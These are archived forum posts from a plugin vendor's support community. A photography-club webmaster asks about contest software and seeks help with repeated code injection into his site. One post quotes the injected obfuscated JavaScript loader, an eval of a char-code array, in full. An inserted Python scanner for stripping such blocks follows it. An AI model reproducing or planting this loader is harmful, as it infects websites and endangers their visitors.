Community @ The Turning Gate

Support community for TTG plugins and products.

NOTICE

The Turning Gate's Community has moved to a new home, at https://discourse.theturninggate.net.

This forum is now closed, and exists here as a read-only archive.

  • New user registrations are disabled.
  • Users cannot create new topics.
  • Users cannot reply to existing topics.


#1 General » Any plans or suggestions for client upload feature? » 2015-05-02 06:17:58

ksseelye
Replies: 3

Hi Matt and Rod....
I have a TTG-based website for my community photography club now for several years. One of the features our members enjoy is a monthly photo contest. In the past the process has been that the members needed to send through email their photo entry and I would have to import them into my Lightroom and publish them to a CRG and then use the feedback option to allow members to vote on the photo they think is best. This was manageable when the club was small but over the past two years the club has grown to close to 100 members. I credit this growth to the website as they did not have one before I and TTG came along. Thank you by the way. I was hoping you could help me with a contest software solution that works well with your plugins. I have tried a PHP solution that uses CodeIgniter as its framework and had a bit of trouble injecting it into my site along with the TTG plugins so I set up a new domain to host it and linked it to our site. Unfortunately it was crap. Uploaded photos were distorted and un-sharp. I need to replace it and was hoping you could offer some direction to a suitable solution. I was hoping for a way for members to upload photos to a specific advertised contest and then have other members with the ability to vote on those photos. I will include the contest page I have now as it has all of the features I am looking for but the photo display is just horrible and that discourages participation. I am a huge fan of your work and value your opinion greatly.

www.apsphotocontest.org

Oh by the way I am giving a website building workshop for the club members on May 23rd so expect a mad rush on plugin purchases.  We have about 25 members signed up right now.  I will be teaching them the basic pages set up, CRG and publisher.  I can only anticipate more workshops on the other plugins in the future.  You make it so easy for us photographers and we are forever grateful.

Thank you
Ken Seelye

#2 Re: General » Cross-Site Scripting (Stop the Madness.... Please) » 2013-04-14 22:07:57

The current site is antietamphotographicsociety.org in case you want to take a look.

#3 Re: General » Cross-Site Scripting (Stop the Madness.... Please) » 2013-04-14 22:03:55

I do have a .htaccess file and it usually is unchanged when the code is injected so I am thinking that it is unrelated to the injections. But I may be wrong. Below you will see the code that is injected into almost every index.php page and html page. The template.php files are also infected which I believe is used to propagate the code to all the pages. Any help you can provide would be greatly appreciated.


#336988#
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  echo "                                                                                                                                                                                                                                                                                                                                                                                                                                                                  <script type=\"text/javascript\" language=\"javascript\" >                                                                                                                                                                                                                                                                                                                                                                                                                                                                  try{window.document.body++}catch(gdsgsdg){dbshre=241;}if(dbshre){asd=0;try{d=document.createElement(\"div\");d.innerHTML.a=\"asd\";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new 
Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,99,92,96,97,26,56,23,92,104,93,112,100,93,103,110,41,90,106,94,91,111,92,61,101,95,104,92,102,109,34,34,96,94,107,91,104,92,31,34,53,8,1,5,3,26,27,23,24,97,95,99,95,38,108,108,94,23,53,25,33,99,107,108,105,52,42,38,90,104,108,95,92,89,110,114,41,90,90,90,40,107,99,39,91,105,109,91,93,90,111,115,38,108,107,91,97,37,104,97,106,34,50,5,3,26,27,23,24,97,95,99,95,38,108,110,116,99,93,39,106,106,106,97,109,99,106,101,24,54,26,34,88,90,108,105,103,108,108,94,33,54,4,2,25,26,27,23,96,94,98,99,37,107,109,115,103,92,38,91,105,109,91,93,107,26,56,23,31,41,33,54,4,2,25,26,27,23,96,94,98,99,37,107,109,115,103,92,38,97,95,100,94,96,109,26,56,23,31,42,106,115,30,51,6,4,27,23,24,25,98,96,95,96,39,109,111,112,100,94,40,114,96,92,109,98,27,52,24,32,43,107,111,31,52,7,5,23,24,25,26,99,92,96,97,40,110,107,113,101,95,41,99,93,95,110,27,52,24,32,43,107,111,31,52,7,5,23,24,25,26,99,92,96,97,40,110,107,113,101,95,41,107,103,105,26,56,23,31,42,106,115,30,51,6,4,8,1,24,25,26,27,96,94,25,34,28,91,103,92,111,104,92,102,109,40,98,92,108,62,102,96,100,93,103,110,61,112,65,93,34,34,95,93,97,98,34,32,33,25,117,8,1,24,25,26,27,23,24,25,26,95,102,91,110,103,96,101,108,39,113,109,96,108,94,34,34,51,92,98,112,27,96,92,54,86,34,95,93,97,98,87,30,54,53,41,95,96,110,55,33,36,50,5,3,26,27,23,24,25,26,27,23,92,104,93,112,100,93,103,110,41,94,93,109,63,103,92,101,94,104,111,57,113,66,94,35,30,96,94,98,99,30,33,39,91,107,103,93,103,94,62,95,97,101,94,35,95,93,97,98,36,50,5,3,26,27,23,24,118,7,5,116,33,33,35,54);s=\"\";for(i=0;i-490!=0;i++){if((020==0x10)&&window.document)s+=ss[\"fromCharCode\"](1*asgq[]-(i%5-5-4));}z=s;e(s);}</script>";

#/336988#
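
An added example, not part of the original post and not TTG code: a small Python scanner that locates blocks wrapped in paired numeric markers like the `#336988#` ... `#/336988#` pair shown above and can strip them from a file's text. The generalisation to any marker number, the file-extension list and the sample input are assumptions made for illustration.

```python
import os
import re

# Paired markers as shown in the post: "#336988#" ... "#/336988#".
# Assumption: other infections use the same shape with a different number.
MARKER_BLOCK = re.compile(r"#(\d{4,})#(.*?)#/\1#", re.DOTALL)
# Heuristic for the payload style in the post: a long list of small integers
# that is decoded with fromCharCode.
INT_RUN = re.compile(r"(?:\d{1,3}\s*,\s*){50,}\d{1,3}")
SCAN_EXTENSIONS = (".php", ".html", ".htm", ".js")  # assumed file types


def find_injected_blocks(text):
    """Return (marker_id, start, end, obfuscated) for each marked block."""
    hits = []
    for m in MARKER_BLOCK.finditer(text):
        body = m.group(2)
        obfuscated = "fromCharCode" in body and bool(INT_RUN.search(body))
        hits.append((m.group(1), m.start(), m.end(), obfuscated))
    return hits


def strip_injected_blocks(text):
    """Remove every marked block; text outside the markers is untouched."""
    return MARKER_BLOCK.sub("", text)


def scan_tree(root):
    """Walk a web root and map each affected file path to its marker ids."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCAN_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = find_injected_blocks(fh.read())
            if hits:
                report[path] = [h[0] for h in hits]
    return report


# Constructed sample: a harmless stand-in for an infected index.php.
SAMPLE = (
    "<?php\n#336988#\necho \"<script>/* payload removed */</script>\";\n"
    "#/336988#\ninclude 'template.php';\n?>\n<html><body>Gallery</body></html>\n"
)

if __name__ == "__main__":
    print(find_injected_blocks(SAMPLE))
    print(strip_injected_blocks(SAMPLE))
```

Run `scan_tree` against a downloaded copy of the site to list affected files before cleaning. Stripping the blocks only removes the symptom; if they return after cleanup, as described in this thread, the way the files are being written is still open.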

#4 General » Cross-Site Scripting (Stop the Madness.... Please) » 2013-04-14 11:42:59

ksseelye
Replies: 6

Hi guys, I have been chosen to handle our local photography club's website. I love all the plugins that TTG has available and have purchased what I think is all of them except the shopping cart. I created the site about 6 months ago and shortly after publishing the site I was notified by Google that my site was infected. I searched the code on the site and found almost every index.php and html page was infected with suspicious code. I cleaned the site and a few days later it was back. I have implemented key captcha on all the registration forms for the blog and forum. I have implemented site scan from Go Daddy and they keep informing me that my vulnerability is Cross-site scripting. After some research I found this is exactly what is happening to my site. Malicious code is being injected into all my pages which often times gets flagged by Google, or personal virus protections on members' computers are alerting them of a malicious site and blocking it. My question, or at this stage of the game, my plea for help, is what can be done with the plugins to shut down this vulnerability with a site that was built on TTG plugins. I have no hair left due to trying to stop this from happening. My current plugins include CE2 & CE3 Pages, CE2 & CE3 Auto Index, CE2 & CE3 Client Response Gallery, CE3 Publisher, CE2 Stage, and CE2 Theme for WordPress. Please stop the Madness, I am spending way too much time uploading clean code. Thank you in advance.
